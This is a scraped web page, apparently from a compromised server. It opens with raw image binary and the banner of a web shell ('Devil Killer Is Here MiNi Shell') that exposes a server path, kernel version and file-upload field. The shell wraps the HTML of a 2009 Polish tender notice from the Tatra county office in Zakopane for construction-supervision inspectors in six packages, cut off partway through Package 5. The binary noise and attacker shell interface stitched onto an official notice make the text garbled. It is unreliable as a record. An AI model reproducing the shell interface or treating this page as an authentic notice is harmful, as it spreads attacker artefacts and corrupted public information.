JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090304/49836-N-2009.html

<p class="kh_header"><b>Zakopane: Wykonywanie obowiązków inspektora nadzoru inwestorskiego nad realizacją robót budowlanych prowadzonych przez Powiat Tatrzański</b><br>
<b>Numer ogłoszenia: 49836 - 2009; data zamieszczenia: 04.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Zakopanem Zarząd Powiatu Tatrzańskiego , ul. Chramcówki 15, 34-500 Zakopane, woj. małopolskie, tel. 018 2017100 w. 30, faks (018) 2017104.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.tatry.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie obowiązków inspektora nadzoru inwestorskiego nad realizacją robót budowlanych prowadzonych przez Powiat Tatrzański.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem przetargu jest wybór Wykonawcy, który będzie świadczył usługi na rzecz Zamawiającego, tj. Starostwa Powiatowego w Zakopanem, ul. Chramcówki 15, 34-500 Zakopane, polegające na świadczeniu usług w zakresie wykonywania obowiązków inspektora nadzoru inwestorskiego nad realizacją robót budowlanych prowadzonych przez Powiat Tatrzański, z podziałem na sześć Pakietów, których szczegółowy podział oraz zakres został określony w punkcie 3.2. przedmiotowej SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w niniejszym postępowaniu nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O niniejsze zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki podmiotowe:
I. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i ust. 2 ustawy,
ocena spełnienia powyższego warunku będzie dokonana na podstawie:
1) Składanego do oferty przetargowej przez Wykonawcę oświadczenia odpowiadającego wymaganiom określonym w punkcie 9.1.1) SIWZ,
2) Składanego przez Wykonawców do oferty przetargowej aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej odpowiadającego wymaganiom określonym w punkcie 9.1.2) SIWZ,
- na zasadzie spełnia / nie spełnia.
II. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
ocena spełnienia powyższego warunku będzie dokonana na podstawie:
1) Składanego przez Wykonawców do oferty przetargowej wykazu wykonanych usług odpowiadającego wymaganiom określonym w punkcie 9.2.1) SIWZ,
2) Składanego przez Wykonawców do oferty przetargowej wykazu osób, które będą wykonywać zamówienie odpowiadającego wymaganiom określonym w punkcie 9.2.2) SIWZ,
- na zasadzie spełnia / nie spełnia.
III. Znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia,
ocena spełnienia powyższego warunku będzie dokonana na podstawie:
1) Składanego do oferty przetargowej przez Wykonawcę oświadczenia odpowiadającego wymaganiom określonym w punkcie 9.1.1) SIWZ.
- na zasadzie spełnia / nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy, Wykonawca zobowiązany jest do oferty przetargowej złożyć następujące dokumenty i oświadczenia:
1) Oświadczenie Wykonawcy zgodne z art. 22 ust. 1, i art. 24 ust. 1 i 2 ustawy - sporządzone według wzoru stanowiącego Załącznik numer 3 do niniejszej SIWZ, 
2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,

II. W celu potwierdzenia, opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Wykonawca zobowiązany jest do oferty przetargowej złożyć następujące dokumenty i oświadczenia:
1) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługą stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie (np. listy referencyjne), z którego wynika, że Wykonawca w ciągu ostatnich trzech lat:
a) Składając ofertę przetargową w zakresie Pakietu Nr 1:
Wykonał co najmniej jedną usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot przetargu. Przez usługi odpowiadające swoim rodzajem i wartością usługą stanowiącym przedmiot przetargu należy rozumieć wykonanie przez Wykonawcę nadzoru inwestorskiego w zakresie budowy, przebudowy, modernizacji lub remontu nawierzchni dróg o wartości świadczonej usługi minimum 3.000,00 zł brutto lub wartość nadzorowanych robót rodzajowo określonych powyżej wynosiła minimum 200.000,00 zł brutto,
b) Składając ofertę przetargową w zakresie Pakietu Nr 2:
Wykonał co najmniej jedną usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot przetargu. Przez usługi odpowiadające swoim rodzajem i wartością usługą stanowiącym przedmiot przetargu należy rozumieć wykonanie przez Wykonawcę nadzoru inwestorskiego w zakresie budowy, przebudowy, modernizacji lub remontu nawierzchni dróg o wartości świadczonej usługi minimum 20.000,00 zł brutto lub wartość nadzorowanych robót rodzajowo określonych powyżej wynosiła minimum 2.000.000,00 zł brutto,
c) Składając ofertę przetargową w zakresie Pakietu Nr 3:
Wykonał co najmniej jedną usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot przetargu. Przez usługi odpowiadające swoim rodzajem i wartością usługą stanowiącym przedmiot przetargu należy rozumieć wykonanie przez Wykonawcę nadzoru inwestorskiego w zakresie budowy, przebudowy, modernizacji lub remontu mostów o wartości świadczonej usługi minimum 10.000,00 zł brutto lub wartość nadzorowanych robót rodzajowo określonych powyżej wynosiła minimum 1.000.000,00 zł brutto,
d) Składając ofertę przetargową w zakresie Pakietu Nr 4:
Wykonał co najmniej jedną usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot przetargu. Przez usługi odpowiadające swoim rodzajem i wartością usługą stanowiącym przedmiot przetargu należy rozumieć wykonanie przez Wykonawcę nadzoru inwestorskiego w zakresie budowy, przebudowy, modernizacji lub remontu mostów o wartości świadczonej usługi minimum 15.000,00 zł brutto lub wartość nadzorowanych robót rodzajowo określonych powyżej wynosiła minimum 1.500.000,00 zł brutto,
e) Składając ofertę przetargową w zakresie Pakietu Nr 5:
Wykonał co najmniej jedną usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot przetargu. Przez usługi odpowiadające swoim rodzajem i wartością usługą stanowiącym przedmiot przetargu należy rozumieć wykonanie przez Wykonawcę nadzoru inwestorskiego w zakresie budowy, przebudowy, modernizacji lub remontu budynków o wartości świadczonej usługi minimum 6.000,00 zł brutto lub wartość nadzorowanych robót rodzajowo określonych powyżej wynosiła minimum 400.000,00 zł brutto,
f) Składając ofertę przetargową w zakresie Pakietu Nr 6:
Wykonał co najmniej jedną usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot przetargu. Przez usługi odpowiadające swoim rodzajem i wartością usługą stanowiącym przedmiot przetargu należy rozumieć wykonanie przez Wykonawcę nadzoru inwestorskiego w zakresie budowy, przebudowy, modernizacji lub remontu nawierzchni dróg o wartości świadczonej usługi minimum 8.000,00 zł brutto lub wartość nadzorowanych robót rodzajowo określonych powyżej wynosiła minimum 500.000,00 zł brutto,
- udokumentowaną referencjami (zakres wykonanych usług oraz ich wartość wymienionych w wykazie muszą mieć odzwierciedlenie w dokumentach potwierdzających, że usługi te zostały wykonane należycie np. listy referencyjne), a cały wykaz musi zostać sporządzony według wzoru stanowiącego Załącznik numer 4 do SIWZ,
2) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, lub ewentualnie dodatkowo pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w niniejszym punkcie, wykonawca wskazał osoby, którymi będzie dysponował sporządzony według wzoru Załącznik numer 5 do SIWZ. 
Zamawiający uzna warunek za spełniony,  jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował odpowiednio wykwalifikowanym personelem, posiadającym niezbędne uprawnienia do nadzorowania robót w specjalności: 
a) Składając ofertę przetargową w zakresie Pakietu Nr 1:
- Drogowej - minimum 1 osoba, z co najmniej 5 letnim doświadczeniem zawodowym jako kierownika wyżej wymienionych robót. 
b) Składając ofertę przetargową w zakresie Pakietu Nr 2:
- Drogowej - minimum 1 osoba, z co najmniej 5 letnim doświadczeniem zawodowym jako kierownika wyżej wymienionych robót. 
c) Składając ofertę przetargową w zakresie Pakietu Nr 3:
- Mostowej - minimum 1 osoba, z co najmniej 5 letnim doświadczeniem zawodowym jako kierownika wyżej wymienionych robót. 
d) Składając ofertę przetargową w zakresie Pakietu Nr 4:
- Mostowej - minimum 1 osoba, z co najmniej 5 letnim doświadczeniem zawodowym jako kierownika wyżej wymienionych robót. 
e) Składając ofertę przetargową w zakresie Pakietu Nr 5:
- Konstrukcyjno-budowlanej - minimum 1 osoba, z co najmniej 5 letnim doświadczeniem zawodowym jako kierownika wyżej wymienionych robót,
f) Składając ofertę przetargową w zakresie Pakietu Nr 6:
- Konstrukcyjno-budowlanej - minimum 1 osoba, z co najmniej 5 letnim doświadczeniem zawodowym jako kierownika wyżej wymienionych robót,
- Drogowej - minimum 1 osoba, z co najmniej 5 letnim doświadczeniem zawodowym jako kierownika wyżej wymienionych robót. 
Do wykazu, o którym mowa w niniejszym punkcie 2) Wykonawcy są zobowiązani dołączyć dokumenty stwierdzające, że osoby, o których mowa wyżej posiadają wymagane uprawnienia, tj. oryginały lub kserokopie uprawnień zawodowych wraz z aktualnym zaświadczeniem o przynależności tych osób do właściwej izby samorządu zawodowego.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat.tatry.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziby Zamawiającego, tj.: Starostwo Powiatowe w Zakopanem ul. Chramcówki 15, 34-500 Zakopane.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2009 godzina 11:00, miejsce: Ofertę należy składać w siedzibie Zamawiającego, tj. Starostwa Powiatowego w Zakopanem, ulica Chramcówki 15, 34-500 Zakopane, pokój nr 1 Dziennik Podawczy, osobiście lub za pośrednictwem poczty.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet - Nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług będących przedmiotem niniejszego postępowania przetargowego, o których mowa wyżej, tj. wykonywania obowiązków inspektora nadzoru inwestorskiego nad realizacją robót budowlanych prowadzonych przez Powiat Tatrzański, w szczególności polega na: 
1) Wykonywaniu obowiązków inspektora nadzoru inwestorskiego nad realizacją robót remontowych prowadzonych przez Powiat Tatrzański w roku 2009 w zakresie dróg powiatowych, które obejmują:
a) Bieżącą konserwację nawierzchni asfaltowych.
2) Zadaniem Wykonawcy jest zapewnienie kompleksowej obsługi prowadzonych robót w zakresie pełnienia funkcji inspektora nadzoru inwestorskiego nad realizacją robót remontowych w zakresie dróg powiatowych, które obejmują następujące branże:
a) Drogową.
3) Zamawiający informuje, że prowadzenie robót określonych powyżej  planuje się na okres od wiosny do jesieni 2009 roku.
4) Miejscem wykonywania usług będących przedmiotem niniejszego Pakietu są drogi powiatowe zlokalizowane na terenie Powiatu Tatrzańskiego.
5) Zamawiający informuje, że szacunkowa wartość nadzorowanych robót, na dzień wszczęcia niniejszego postępowania przetargowego, szacuje się na kwotę ok. 200.000,00 zł brutto. 
6) Ponadto Zamawiający informuje, że kwota podana w punkcie 5 powyżej jest kwotą szacunkową określoną na podstawie aktualnie obowiązującego planu finansowego oraz przed rozstrzygnięciem postępowań przetargowych mających na celu wyłonienie wykonawców robót budowlanych, w wyniku czego Zamawiającego zastrzega sobie prawo dokonania korekty wartości nadzorowanych robót (określonej powyżej) oraz planu finansowego, zgodnie z decyzjami podjętymi przez Zarządu Powiatu Tatrzańskiego, co może skutkować zwiększeniem lub ograniczeniem faktycznie wykonywanego zakresu usługi.
W związku z powyższym Zamawiający informuje, że zaoferowane przez Wykonawcę wynagrodzenie określone w wartości procentowej będzie stałe i nie będzie podlegało zmianie, natomiast może ulec zmianie wartość nadzorowanych robót.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet - Nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług będących przedmiotem niniejszego postępowania przetargowego, o których mowa wyżej, tj. wykonywania obowiązków inspektora nadzoru inwestorskiego nad realizacją robót budowlanych prowadzonych przez Powiat Tatrzański, w szczególności polega na: 
1) Wykonywaniu obowiązków inspektora nadzoru inwestorskiego nad realizacją robót remontowych oraz inwestycyjnych prowadzonych przez Powiat Tatrzański w roku 2009 w zakresie dróg powiatowych, które obejmują:
a) Roboty budowlane w ramach usuwania skutków klęsk żywiołowych w ciągu dróg powiatowych.
2) Zadaniem Wykonawcy jest zapewnienie kompleksowej obsługi prowadzonych robót  w zakresie pełnienia funkcji inspektora nadzoru inwestorskiego nad realizacją robót remontowych oraz inwestycyjnych w zakresie dróg powiatowych, które obejmują następujące branże:
a) Drogową.
3) Zamawiający informuje, że prowadzenie robót określonych powyżej planuje się na okres od wiosny do jesieni 2009 roku.
4) Miejscem wykonywania usług będących przedmiotem niniejszego Pakietu jest droga Nr 1649K Łysa Polana - Włosienica zlokalizowana na terenie Powiatu Tatrzańskiego.
5) Zamawiający informuje, że szacunkowa wartość nadzorowanych robót, na dzień wszczęcia niniejszego postępowania przetargowego, szacuje się na kwotę ok. 7.400.000,00 zł brutto. 
6) Ponadto Zamawiający informuje, że kwota podana w punkcie 5 powyżej jest kwotą szacunkową określoną na podstawie aktualnie obowiązującego planu finansowego oraz przed rozstrzygnięciem postępowań przetargowych mających na celu wyłonienie wykonawców robót budowlanych, w wyniku czego Zamawiającego zastrzega sobie prawo dokonania korekty wartości nadzorowanych robót (określonej powyżej) oraz planu finansowego, zgodnie z decyzjami podjętymi przez Zarządu Powiatu Tatrzańskiego, co może skutkować zwiększeniem lub ograniczeniem faktycznie wykonywanego zakresu usługi.
W związku z powyższym Zamawiający informuje, że zaoferowane przez Wykonawcę wynagrodzenie określone w wartości procentowej będzie stałe i nie będzie podlegało zmianie, natomiast może ulec zmianie wartość nadzorowanych robót.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet - Nr 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług będących przedmiotem niniejszego postępowania przetargowego, o których mowa wyżej, tj. wykonywania obowiązków inspektora nadzoru inwestorskiego nad realizacją robót budowlanych prowadzonych przez Powiat Tatrzański, w szczególności polega na: 
1) Wykonywaniu obowiązków inspektora nadzoru inwestorskiego nad realizacją robót remontowych oraz inwestycyjnych prowadzonych przez Powiat Tatrzański w roku 2009 w zakresie mostów, które obejmują:
a) Roboty budowlane w ramach usuwania skutków klęsk żywiołowych w ciągu dróg powiatowych.
2) Zadaniem Wykonawcy jest zapewnienie kompleksowej obsługi prowadzonych robót  w zakresie pełnienia funkcji inspektora nadzoru inwestorskiego nad realizacją robót remontowych oraz inwestycyjnych w zakresie mostów, które obejmują następujące branże:
a) Mostową.
3) Zamawiający informuje, że prowadzenie robót określonych powyżej planuje się na okres od wiosny do jesieni 2009 roku.
4) Miejscem wykonywania usług będących przedmiotem niniejszego Pakietu jest droga Nr 1649K Łysa Polana - Włosienica zlokalizowana na terenie Powiatu Tatrzańskiego.
5) Zamawiający informuje, że szacunkowa wartość nadzorowanych robót, na dzień wszczęcia niniejszego postępowania przetargowego, szacuje się na kwotę ok. 1.000.000,00 zł brutto. 
6) Ponadto Zamawiający informuje, że kwota podana w punkcie 5 powyżej jest kwotą szacunkową określoną na podstawie aktualnie obowiązującego planu finansowego oraz przed rozstrzygnięciem postępowań przetargowych mających na celu wyłonienie wykonawców robót budowlanych, w wyniku czego Zamawiającego zastrzega sobie prawo dokonania korekty wartości nadzorowanych robót (określonej powyżej) oraz planu finansowego, zgodnie z decyzjami podjętymi przez Zarządu Powiatu Tatrzańskiego, co może skutkować zwiększeniem lub ograniczeniem faktycznie wykonywanego zakresu usługi.
W związku z powyższym Zamawiający informuje, że zaoferowane przez Wykonawcę wynagrodzenie określone w wartości procentowej będzie stałe i nie będzie podlegało zmianie, natomiast może ulec zmianie wartość nadzorowanych robót.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet - Nr 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług będących przedmiotem niniejszego postępowania przetargowego, o których mowa wyżej, tj. wykonywania obowiązków inspektora nadzoru inwestorskiego nad realizacją robót budowlanych prowadzonych przez Powiat Tatrzański, w szczególności polega na: 
1) Wykonywaniu obowiązków inspektora nadzoru inwestorskiego nad realizacją robót remontowych prowadzonych przez Powiat Tatrzański w roku 2009 w zakresie mostów, które obejmują:
a) Wykonania remontu estakady w ciągu ul. Powstańców Śląskich w Zakopanem Nr 1656K - nitka prawa.
2) Zadaniem Wykonawcy jest zapewnienie kompleksowej obsługi prowadzonych robót  w zakresie pełnienia funkcji inspektora nadzoru inwestorskiego nad realizacją robót remontowych w zakresie estakady, które obejmują następujące branże:
a) Mostową.
3) Zamawiający informuje, że prowadzenie robót określonych powyżej planuje się na okres wiosny 2009 roku.
4) Miejscem wykonywania usług będących przedmiotem niniejszego Pakietu jest ul. Powstańców Śląskich Nr 1656K zlokalizowana na terenie Miasta Zakopane.
5) Zamawiający informuje, że szacunkowa wartość nadzorowanych robót, na dzień wszczęcia niniejszego postępowania przetargowego, szacuje się na kwotę ok. 1.500.000,00 zł brutto. 
6) Ponadto Zamawiający informuje, że kwota podana w punkcie 5 powyżej jest kwotą szacunkową określoną na podstawie aktualnie obowiązującego planu finansowego oraz przed rozstrzygnięciem postępowań przetargowych mających na celu wyłonienie wykonawców robót budowlanych, w wyniku czego Zamawiającego zastrzega sobie prawo dokonania korekty wartości nadzorowanych robót (określonej powyżej) oraz planu finansowego, zgodnie z decyzjami podjętymi przez Zarządu Powiatu Tatrzańskiego, co może skutkować zwiększeniem lub ograniczeniem faktycznie wykonywanego zakresu usługi.
W związku z powyższym Zamawiający informuje, że zaoferowane przez Wykonawcę wynagrodzenie określone w wartości procentowej będzie stałe i nie będzie podlegało zmianie, natomiast może ulec zmianie wartość nadzorowanych robót.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet - Nr 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług będących przedmiotem niniejszego postępowania przetargowego, o których mowa wyżej, tj. wykonywania obowiązków inspektora nadzoru inwestorskiego nad realizacją robót budowlanych prowadzonych przez Powiat Tatrzański, w szczególności polega na: 
1) Wykonywaniu obowiązków inspektora nadzoru inwestorskiego nad realizacją robót remontowych oraz inwestycyjnych prowadzonych przez Powiat Tatrzański w roku 2009 w zakresie robót ogólnobudowlanych, które obejmują:
a) Remont siedziby Starostwa Powiatowego w Zakopanem, ul. Chramcówki 15,
b) Termomodernizacja budynku Liceum Ogólnokształcącego oraz remont boiska przy Zespole Szkół Ogólnokształcących w Zakopanem, ul. Słoneczna 1.
